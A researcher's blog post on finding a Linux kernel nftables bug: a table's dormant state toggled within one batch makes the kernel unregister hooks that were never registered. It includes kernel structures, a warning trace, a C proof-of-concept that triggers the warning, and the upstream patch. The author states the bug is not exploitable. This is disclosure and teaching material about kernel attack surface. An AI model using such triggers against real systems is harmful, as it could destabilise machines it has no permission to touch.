nftables Adventures: An Introduction to Bug Hunting and the Dormant State Bug [Part 1] - Wed, Sep 27, 2023
TLDR
I tried my hand at bug hunting within the nftables subsystem in the Linux kernel, and managed to find a bug where if the dormant state of a table was toggled in a certain way, the kernel would attempt to deactivate hooks that were never activated in the first place. The bug report can be found here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=c9bd26513b3a11b3adb3c2ed8a31a01a87173ff1. Unfortunately (or fortunately), the bug cannot be transformed into a UAF as the kernel performs certain checks that prevents us from reaching any interesting frees.
This is going to be a more rambly writeup where I will talk about my experiences and thought processes while bug hunting in addition to explaining the root cause of the bug; if you would like to read a more official and concise version, check out this link: https://starlabs.sg/blog/2023/09-nftables-adventures-bug-hunting-and-n-day-exploitation/. Otherwise, gather ‘round the nftable; let’s go on an adventure!
nfTable of Contents
- Introduction to nftables
- nftables Dormant State Chain Hook Deactivation Bug
- Triggering the Bug
- Patch Analysis
- My Bug Hunting Experience
- References and Credits
Introduction to nftables
nftables is a modern packet filtering framework that aims to replace the legacy {ip,ip6,arp,eb}_tables (xtables) infrastructure. It reuses the existing netfilter hooks, which act as entry points for handlers that perform various operations on packets. Nftables table objects contain a list of chain objects, which contain a list of rule objects, which finally contain expressions, which perform the operations of the pseudo-state machine.
Tables
Tables are top-level objects which contain chains, sets, objects and flowtables. Internally, tables are represented by struct nft_table
.
/**
* struct nft_table - nf_tables table
*
* @list: used internally
* @chains_ht: chains in the table
* @chains: same, for stable walks
* @sets: sets in the table
* @objects: stateful objects in the table
* @flowtables: flow tables in the table
* @hgenerator: handle generator state
* @handle: table handle
* @use: number of chain references to this table
* @flags: table flag (see enum nft_table_flags)
* @genmask: generation mask
* @afinfo: address family info
* @name: name of the table
* @validate_state: internal, set when transaction adds jumps
*/
struct nft_table {
struct list_head list;
struct rhltable chains_ht;
struct list_head chains;
struct list_head sets;
struct list_head objects;
struct list_head flowtables;
u64 hgenerator;
u64 handle;
u32 use;
u16 family:6,
flags:8,
genmask:2;
u32 nlpid;
char *name;
u16 udlen;
u8 *udata;
u8 validate_state;
};
A table can have multiple different flags. The user is able to set the flags NFT_TABLE_F_DORMANT
and/or NFT_TABLE_F_OWNER
when the table is created (nf_tables_newtable
). The dormant state flag (NFT_TABLE_F_DORMANT
) can be updated in nf_tables_updtable
. If NFT_TABLE_F_DORMANT
(0x1) is set, the table will be made dormant, and all its basechain hooks will be unregistered, but the table will not be deleted. There are also internally set __NFT_TABLE_F_UPDATE
flags, which comprise of __NFT_TABLE_F_WAS_AWAKEN
and __NFT_TABLE_F_WAS_DORMANT
.
Chains
Chains can either be base chains, which are registered with a netfilter hook and cannot be jumped to, or normal chains, which are not registered with a hook but can be jumped to. Internally, chains are represented by struct nft_chain
.
/**
* struct nft_chain - nf_tables chain
*
* @rules: list of rules in the chain
* @list: used internally
* @rhlhead: used internally
* @table: table that this chain belongs to
* @handle: chain handle
* @use: number of jump references to this chain
* @flags: bitmask of enum nft_chain_flags
* @name: name of the chain
*/
struct nft_chain {
struct nft_rule_blob __rcu *blob_gen_0;
struct nft_rule_blob __rcu *blob_gen_1;
struct list_head rules;
struct list_head list;
struct rhlist_head rhlhead;
struct nft_table *table;
u64 handle;
u32 use;
u8 flags:5,
bound:1,
genmask:2;
char *name;
u16 udlen;
u8 *udata;
/* Only used during control plane commit phase: */
struct nft_rule_blob *blob_next;
};
Basechains are represented by struct nft_base_chain
.
/**
* struct nft_base_chain - nf_tables base chain
*
* @ops: netfilter hook ops
* @hook_list: list of netfilter hooks (for NFPROTO_NETDEV family)
* @type: chain type
* @policy: default policy
* @stats: per-cpu chain stats
* @chain: the chain
* @flow_block: flow block (for hardware offload)
*/
struct nft_base_chain {
struct nf_hook_ops ops;
struct list_head hook_list;
const struct nft_chain_type *type;
u8 policy;
u8 flags;
struct nft_stats __percpu *stats;
struct nft_chain chain;
struct flow_block flow_block;
};
Rules
Rules contain nftables expressions. Internally, rules are represented by struct nft_rule
.
/**
* struct nft_rule - nf_tables rule
*
* @list: used internally
* @handle: rule handle
* @genmask: generation mask
* @dlen: length of expression data
* @udata: user data is appended to the rule
* @data: expression data
*/
struct nft_rule {
struct list_head list;
u64 handle:42,
genmask:2,
dlen:12,
udata:1;
unsigned char data[]
__attribute__((aligned(__alignof__(struct nft_expr))));
};
Expressions
Expressions act as the operations of the state machine. There are many expressions, here are some for example:
- Bitwise: Performs bitwise operations
- Immediate: To load data into registers. Also allows for jumps/goto to another normal chain
- Byteorder: To change from host/network endianness
- Compare: To compare values in two registers
- Counter: To enable counters in rules
Interally, expressions are represented by struct nft_expr
.
/**
* struct nft_expr - nf_tables expression
*
* @ops: expression ops
* @data: expression private data
*/
struct nft_expr {
const struct nft_expr_ops *ops;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};
Each expression also has a struct nft_expr_ops
representing various operations.
/**
* struct nft_expr_ops - nf_tables expression operations
*
* @eval: Expression evaluation function
* @size: full expression size, including private data size
* @init: initialization function
* @activate: activate expression in the next generation
* @deactivate: deactivate expression in next generation
* @destroy: destruction function, called after synchronize_rcu
* @dump: function to dump parameters
* @type: expression type
* @validate: validate expression, called during loop detection
* @data: extra data to attach to this expression operation
*/
struct nft_expr_ops {
void (*eval)(const struct nft_expr *expr,
struct nft_regs *regs,
const struct nft_pktinfo *pkt);
int (*clone)(struct nft_expr *dst,
const struct nft_expr *src);
unsigned int size;
int (*init)(const struct nft_ctx *ctx,
const struct nft_expr *expr,
const struct nlattr * const tb[]);
void (*activate)(const struct nft_ctx *ctx,
const struct nft_expr *expr);
void (*deactivate)(const struct nft_ctx *ctx,
const struct nft_expr *expr,
enum nft_trans_phase phase);
void (*destroy)(const struct nft_ctx *ctx,
const struct nft_expr *expr);
void (*destroy_clone)(const struct nft_ctx *ctx,
const struct nft_expr *expr);
int (*dump)(struct sk_buff *skb,
const struct nft_expr *expr,
bool reset);
int (*validate)(const struct nft_ctx *ctx,
const struct nft_expr *expr,
const struct nft_data **data);
bool (*reduce)(struct nft_regs_track *track,
const struct nft_expr *expr);
bool (*gc)(struct net *net,
const struct nft_expr *expr);
int (*offload)(struct nft_offload_ctx *ctx,
struct nft_flow_rule *flow,
const struct nft_expr *expr);
bool (*offload_action)(const struct nft_expr *expr);
void (*offload_stats)(struct nft_expr *expr,
const struct flow_stats *stats);
const struct nft_expr_type *type;
void *data;
};
Genmask System
Many nftables objects have a 2 bit genmask, which specifies whether an object is active in the current and/or next generation. If a bit is set, the object is not active in that generation. There is an overall gencursor defining the bit that represents the current generation. Objects can have the following states:
- Active in both the current and next generation (e.g. unchanged objects)
- Active in the current generation, inactive in the next generation (e.g. objects marked for deletion)
- Inactive in the current generation, active in the next generation (e.g. newly created objects)
Control Plane, Transaction System and Transaction Worker
In nftables, actions requested by userspace (via a netlink message) are performed in the control plane, which include functions such as nf_tables_newtable
, nf_tables_updtable
, nf_tables_newchain
and more. The control plane is in charge of the creation and allocation of objects, activating/deactivating objects in the next generation, linking objects, and modifying the “use” refcount of objects. However, newly created objects are not immediately activated after creation; they are only activated in the commit phase when a new generation is started. All actions in the control plane that involve the creation or updating of objects will add a new transaction to the transaction list.
When a netlink batch transaction is considered to be valid (i.e. all actions in the control plane do not return errors), the commit phase is entered and nf_tables_commit
is called. A new generation will be started, resulting in all newly created objects becoming active, and actions in the transaction list will be performed. The commit phase is also in charge of unlinking objects that are to be deleted, and queuing the asynchronous transaction worker in charge of destroying objects (nf_tables_trans_destroy_work
).
The asynchronous transaction worker, when run, will call nft_commit_release
, which will finally call functions that will destroy and free objects marked for deletion.
nftables Dormant State Chain Hook Deactivation Bug
While researching nftables, through manual source code review, I was able to identify a bug that resulted in a warning splat. The bug report can be seen here: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=c9bd26513b3a11b3adb3c2ed8a31a01a87173ff1
When a newly created table table is updated via nf_tables_updtable
from active to dormant, the table flag is set to NFT_TABLE_F_DORMANT
, and as none of the __NFT_TABLE_F_UPDATE
flags are set, the __NFT_TABLE_F_WAS_AWAKEN
flag will be set. When updating a table from active to dormant, the chain hooks are not deactivated until nf_tables_commit
is called. However, when a table is updated from dormant to active, the NFT_TABLE_F_DORMANT
flag is unset. It then checks if any of the __NFT_TABLE_F_UPDATE
flags are set, and if none are set, the chain hooks are instantly activated by nf_tables_table_enable
(i.e. before nf_tables_commit
is called). This code behaviour can be seen below:
static int nf_tables_updtable(struct nft_ctx *ctx) {
...
if ((flags & NFT_TABLE_F_DORMANT) &&
!(ctx->table->flags & NFT_TABLE_F_DORMANT)) {
ctx->table->flags |= NFT_TABLE_F_DORMANT;
if (!(ctx->table->flags & __NFT_TABLE_F_UPDATE))
ctx->table->flags |= __NFT_TABLE_F_WAS_AWAKEN;
} else if (!(flags & NFT_TABLE_F_DORMANT) &&
ctx->table->flags & NFT_TABLE_F_DORMANT) {
ctx->table->flags &= ~NFT_TABLE_F_DORMANT;
if (!(ctx->table->flags & __NFT_TABLE_F_UPDATE)) {
ret = nf_tables_table_enable(ctx->net, ctx->table);
if (ret < 0)
goto err_register_hooks;
ctx->table->flags |= __NFT_TABLE_F_WAS_DORMANT;
}
}
...
}
It is possible to activate/deactivate tables in a way such that at one point of time, some chains are registered and some are not registered. This can be done by updating an active table to dormant so that the __NFT_TABLE_F_WAS_AWAKEN
flag, which is one of the __NFT_TABLE_F_UPDATE
flags are set, and then updating the dormant table to active. As one of the __NFT_TABLE_F_UPDATE
flags are set, nf_tables_table_enable
is skipped, leaving some chains unregistered. When an active table is deleted, nf_tables_unregister_hook
only checks if the NFT_TABLE_F_DORMANT
flag is zeroed out. If the flag is unset, all the base chains are assumed to be active and hence all the chain hooks will be deactivated, even if they are not registered in the first place. This causes the following warning to be displayed:
[ 1411.118307] ------------[ cut here ]------------
[ 1411.119665] hook not found, pf 2 num 3
[ 1411.119708] WARNING: CPU: 1 PID: 367 at net/netfilter/core.c:517 __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.124338] Modules linked in:
[ 1411.125549] CPU: 1 PID: 367 Comm: nft Not tainted 6.5.2 #2
[ 1411.127933] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 1411.130939] RIP: 0010:__nf_unregister_net_hook+0xf8/0x2e0
[ 1411.133576] Code: 01 00 0f 85 90 00 00 00 48 8b 3c 24 c6 05 a5 77 dd 01 01 e8 3a 49 fc fe 8b 53 1c 44 89 e6 48 c7 c7 e0 59 31 83 e8 c8 4c c1 fe <0f> 0b eb 6a 44 89 f8 48 c1 e0 04 4c 01 f0 48 8d 78 08 48 89 44 24
[ 1411.143107] RSP: 0018:ffff8880158f7388 EFLAGS: 00010282
[ 1411.145200] RAX: 0000000000000000 RBX: ffff888006c0f200 RCX: 0000000000000000
[ 1411.147892] RDX: 0000000000000002 RSI: ffffffff8114726f RDI: ffffffff85bd0200
[ 1411.150749] RBP: ffffffff85ffdac0 R08: 0000000000000001 R09: ffffed100da64f01
[ 1411.153231] R10: ffff88806d32780b R11: 0000000000000001 R12: 0000000000000002
[ 1411.156197] R13: ffff888007a4cab8 R14: ffff888007a4ca80 R15: 0000000000000002
[ 1411.159507] FS: 00007f03b7cd5d80(0000) GS:ffff88806d300000(0000) knlGS:0000000000000000
[ 1411.162667] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1411.164773] CR2: 00007ffc14b40558 CR3: 0000000017ce8000 CR4: 00000000000006e0
[ 1411.169262] Call Trace:
[ 1411.171044] <TASK>
[ 1411.172713] ? __warn+0x9c/0x200
[ 1411.174282] ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.176416] ? report_bug+0x1f2/0x220
[ 1411.177947] ? handle_bug+0x3c/0x80
[ 1411.179123] ? exc_invalid_op+0x13/0x40
[ 1411.180361] ? asm_exc_invalid_op+0x16/0x20
[ 1411.181887] ? preempt_count_sub+0xf/0xc0
[ 1411.183772] ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.185357] ? __nf_unregister_net_hook+0xf8/0x2e0
[ 1411.187045] nf_tables_commit+0x1a15/0x2600
[ 1411.189373] ? __pfx___nla_validate_parse+0x20/0x20
[ 1411.191535] ? __pfx_lock_release+0x20/0x20
[ 1411.193486] ? __pfx_nf_tables_commit+0x20/0x20
[ 1411.195470] nfnetlink_rcv_batch+0x860/0x1100
[ 1411.197345] ? __pfx_nfnetlink_rcv_batch+0x20/0x20
[ 1411.199436] ? find_held_lock+0x83/0xa0
[ 1411.200948] nfnetlink_rcv+0x1da/0x220
[ 1411.202570] ? __pfx_nfnetlink_rcv+0x20/0x20
[ 1411.204341] ? netlink_deliver_tap+0xf7/0x5e0
[ 1411.206507] netlink_unicast+0x2ca/0x460
[ 1411.208166] ? __pfx_netlink_unicast+0x20/0x20
[ 1411.210278] ? __virt_addr_valid+0xd4/0x160
[ 1411.212405] netlink_sendmsg+0x3d5/0x700
[ 1411.214076] ? __pfx_netlink_sendmsg+0x20/0x20
[ 1411.215943] ? import_ubuf+0xc1/0x100
[ 1411.217517] ? __pfx_netlink_sendmsg+0x20/0x20
[ 1411.219358] sock_sendmsg+0xda/0xe0
[ 1411.220915] ? import_iovec+0x54/0x80
[ 1411.222655] ____sys_sendmsg+0x436/0x500
[ 1411.224223] ? __pfx_____sys_sendmsg+0x20/0x20
[ 1411.226046] ? __pfx_copy_msghdr_from_user+0x20/0x20
[ 1411.227928] ? sk_getsockopt+0xbc7/0x1b20
[ 1411.229274] ? find_held_lock+0x83/0xa0
[ 1411.230507] ___sys_sendmsg+0xf8/0x160
[ 1411.231712] ? __pfx____sys_sendmsg+0x20/0x20
[ 1411.233656] ? __pfx_sk_setsockopt+0x20/0x20
[ 1411.235285] ? sock_has_perm+0xc9/0x1a0
[ 1411.236601] ? __fget_light+0xda/0x100
[ 1411.238418] __sys_sendmsg+0xe5/0x180
[ 1411.240445] ? __pfx___sys_sendmsg+0x20/0x20
[ 1411.241861] ? __sys_getsockopt+0x17d/0x1a0
[ 1411.243273] ? syscall_enter_from_user_mode+0x1c/0x60
[ 1411.244890] do_syscall_64+0x3a/0xa0
[ 1411.246060] entry_SYSCALL_64_after_hwframe+0x6e/0xd8
This bug was introduced in the following commit: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=179d9ba5559a756f4322583388b3213fe4e391b0
Triggering the Bug
To trigger the bug, the following steps should be taken (in the same batch transaction):
- Create a table “test_table” – this table is active [1]
- Update the table “test_table” from active to dormant [2]
a. The
NFT_TABLE_F_DORMANT
and__NFT_TABLE_F_WAS_AWAKEN
table flags are set - Add a basechain “chain1” – this basechain is added to a dormant table and hence is not registered [3]
- Update the table “test_table” from dormant to active [4]
a. The
NFT_TABLE_F_DORMANT
flag is zeroed out, but the__NFT_TABLE_F_WAS_AWAKEN
flag is still set, causingnf_tables_enable_table
to be skipped - Delete the active table “test_table” using the nft utility:
nft delete table test_table
[5]
The table is active when it was deleted, so when the table is being flushed, all the basechains are treated as registered and will be unregistered. However, as basechain “chain1” was never registered, the kernel will try to unregister an unregistered chain, causing a warning.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <stddef.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <time.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>
#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
struct unft_base_chain_param {
uint32_t hook_num;
uint32_t prio;
};
struct nftnl_table* build_table(char* name, uint16_t family) {
struct nftnl_table* t = nftnl_table_alloc();
nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family);
nftnl_table_set_str(t, NFTNL_TABLE_NAME, name);
return t;
}
struct nftnl_chain* build_chain(char* table_name, char* chain_name, struct unft_base_chain_param* base_param, uint32_t chain_id) {
struct nftnl_chain* c;
c = nftnl_chain_alloc();
nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name);
nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name);
if (base_param) {
nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num);
nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio);
}
if (chain_id) {
nftnl_chain_set_u32(c, NFTNL_CHAIN_ID, chain_id);
}
return c;
}
int main(void) {
char buf[MNL_SOCKET_BUFFER_SIZE];
struct nlmsghdr *nlh;
struct mnl_nlmsg_batch *batch;
int ret;
int seq = time(NULL);
uint8_t family = NFPROTO_IPV4;
struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
if (nl == NULL) {
perror("mnl_socket_open");
exit(EXIT_FAILURE);
}
if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
perror("mnl_socket_bind");
exit(EXIT_FAILURE);
}
// Start nl message
batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Create active table "test_table" [1]
struct nftnl_table * t = build_table("test_table", NFPROTO_IPV4);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_nlmsg_build_payload(nlh, t);
mnl_nlmsg_batch_next(batch);
// Update table "test_table" -- table is now dormant [2]
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_set_u32(t, NFTNL_TABLE_FLAGS, 0x1);
nftnl_table_nlmsg_build_payload(nlh, t);
mnl_nlmsg_batch_next(batch);
// Add basechain "chain1" -- not registered [3]
struct unft_base_chain_param bp2;
bp2.hook_num = NF_INET_LOCAL_OUT;
bp2.prio = 11;
struct nftnl_chain * c = build_chain("test_table", "chain1", &bp2, 11);
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_chain_nlmsg_build_payload(nlh, c);
mnl_nlmsg_batch_next(batch);
// Update table "test_table" -- table is now active [4]
nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_set_u32(t, NFTNL_TABLE_FLAGS, 0x0);
nftnl_table_nlmsg_build_payload(nlh, t);
mnl_nlmsg_batch_next(batch);
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);
// Send netlink message
printf("[+] Sending netlink message 1\n");
ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch));
mnl_nlmsg_batch_stop(batch);
// Trigger warning [5]
system("nft delete table test_table");
return 0;
}
If you would like to see a graphical representation, here are some slides from my internship presentation:
Unfortunately (actually fortunately), the bug is unexploitable as we are unable to reach any interesting frees. For filter/route hooks, nf_remove_net_hook
will fail and result in the warning, and for NAT hooks, nat_proto_net->users == 0
, resulting in another warning, preventing us from reaching the free.
Patch Analysis
To patch the bug, the developers decided that it was best to prevent toggling the dormant state more than once in a single batch transaction. I guess the tables were not meant to be updated…periodically ;)
diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
index d819b4d429624..a3680638ec60f 100644
--- a/net/netfilter/nf_tables_api.c
+++ b/net/netfilter/nf_tables_api.c
@@ -1219,6 +1219,10 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
flags & NFT_TABLE_F_OWNER))
return -EOPNOTSUPP;
+ /* No dormant off/on/off/on games in single transaction */
+ if (ctx->table->flags & __NFT_TABLE_F_UPDATE)
+ return -EINVAL;
+
trans = nft_trans_alloc(ctx, NFT_MSG_NEWTABLE,
sizeof(struct nft_trans_table));
if (trans == NULL)
If the update flag was previously set (by toggling the dormant state previously in the same batch transaction), nf_tables_updtable
will simply fail.
My Bug Hunting Experience
Being a noob pwner, every time I see a new zero day drop, I would be like a cat with stars in their eyes :3
I really hoped that one day, I could find a kernel zero day and report it on my own, so I took up a vulnerability research internship to learn the ropes of bug hunting. At that time (around August 2023), there were many new bugs found in the nftables subsystem, so my mentor and I decided that it would be a good target to explore.
In the initial stages of bug hunting, I explored using the Syzkaller fuzzer developed by Google to try fuzzing nftables. I focused on fuzzing net/netfilter/nf_tables_api.c as well as nf_tables_core.c and nf_tables_trace.c using some custom configurations and playing around with external network fuzzing, but had no luck finding any interesting crashes. This is when I decided to turn to manual source code review, as somehow I felt like the bug hunting I was doing was not very directed as fuzzing is a random process which I have little control over. In hindsight, I should have probably explored using custom fuzzing grammar a little harder, as there were indeed nftables bugs found using Syzkaller (such as this one found by the NCC research group).
My mentor suggested that I try to get more familiar and understand nftables as well as the Linux networking stack a little better before I jump headfirst into bug hunting, so I started furiously reading source code and random writeups on the Internet. I also looked at some past CVEs and wrote some code using libmnl
and libnftnl
to get familiar with interacting with nftables from userspace. I felt that I was pretty comfortable with nftables at that point, so I started looking for potential bugs in the source code, thinking that now I would certainly be able to spot some UAF lurking somewhere…
The thing is that I was rather trigger happy, and saw almost everything as a potential point of attack. But of course, the kernel developers expected that random people would try to do miscellaneous terrible things to the kernel, and hence they implemented extensive error checking to prevent easy wins (and my numerous crappy PoCs from doing what I wanted them to do :<). About 2 weeks in, the stats were something like this:
Kaligula vs Kernel
0 : 13
Number of terrible ideas: 13
Number of terrible ideas that worked: 0
We then decided that it would be a good idea to take a known CVE and write an exploit for it as practise (which you can read about in Part 2). Seeing a root shell pop on an Ubuntu machine was indeed very exciting, and the process of debugging the exploit deepened by understanding of nftables even more.
Looking at the nftables commit logs showed that many of the bugs found were found in the net/netfilter/nf_tables_api.c file. This is likely due to many code paths there being easily reachable by interacting with nftables via netlink (as compared to having to send a packet with specific configurations to interact with nf_tables_core or other components). Most nftables bugs also pertained to the following:
- Genmask issues: Being able to access deactivated objects
- Refcount issues: Errors in modifying the
use
refcount in many nftables objects - Asymmetry in allocating/activating and freeing/deactivating objects
- Race conditions
As such, we decided to start searching for variant bugs and start carefully tracing the allocation and deallocation of nftables objects. However, as more and more bugs were found, less errors were present in the code, and bug hunting got more and more difficult. At this point, I started learning and experimenting with CodeQL to see if I can improve the efficiency of my bug hunting process (something that I should probably continue exploring). However, at this point, I still had no luck and was starting to doubt if I could actually find anything within this subsystem :(((
Kaligula :"( vs Kernel >:)
0 : 15
Number of terrible ideas: 15
Number of terrible ideas that worked: 0
At that point I was getting slightly demoralized and was contemplating switching to another target, but on the other hand I was also really invested in nftables and really wanted to find any random bug in the subsystem. I thought that if I learned to think like the kernel developer and see what they intended to do by introducing certain features, I could think of ways to make something go terribly wrong and hopefully find a bug! I started reading nftables commit logs from the start, to track the timeline of when certain features (e.g. toggling a table between dormant/active) were introduced, and what they were actually meant to do. By a stroke of luck I realized that it was possible to mess with the dormant/active states of a table and try to unregister hooks that were never even registered. Finally, I was able to report a bug and trigger a warning, even though in the end the bug proved to be unexploitable.
Some key takeaways I had while bug hunting:
- Try to get a good understanding of the target subsystem before starting to hunt for bugs
- Trace the life cycle of a target kernel object – know where objects are allocated and deallocated
- Know what you can control from userspace – it is possible to find issues that are impossible to exploit simply because you cannot control any of the variables from userspace
- Static analysis tools could possibly be helpful in streamlining your workflow
While trying to find bugs in nftables, I started aggressively re-binging Battle Angel Alita (by the wonderful Yukito Kishiro). This panel really stuck with me throughout and kept me going through the entire bug hunting process:
Do check out part 2 of this series here, where I analyze the root cause of CVE-2023-31248 and do a deep dive into the exploitation process.
Thanks for reading, and happy hacking!
References and Credits
- David Bouman for his article on nftables and for the helper library functions https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016/
- Elixir Bootlin for the kernel source code https://elixir.bootlin.com/linux/v6.2/source/net/netfilter/nf_tables_api.c
- Billy for putting up with my terrible ideas
- Nobeko for the adorable stars in eyes cat gif :3
- Yukito Kishiro for the amazing manga that is Battle Angel Alita and for the image of Jashugan’s face